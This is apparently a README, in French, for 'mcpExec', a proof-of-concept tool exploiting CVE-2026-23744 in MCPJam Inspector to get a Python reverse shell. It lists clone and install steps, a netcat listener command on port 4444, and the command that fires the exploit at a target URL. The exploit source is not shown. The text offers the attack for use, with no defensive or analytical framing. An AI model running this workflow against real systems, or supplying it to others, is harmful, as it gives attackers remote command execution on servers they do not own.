
POC pour CVE-2026-23744 pour un reverse shell Python
mcpExec est un outil qui exploite la CVE-2026-23744 pour obtenir un reverse shell via l'URL de l'installation vulnérable de MCPJam Inspector.
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
Pour quitter le venv :
deactivate
Ouvrez un écouteur pour que l'exploit fonctionne :
nc -nvlp 4444
Cette commande vous fournira le reverse shell (si le système affecté dispose de Python3 installé).
./mcpExec.py http://localhost:6274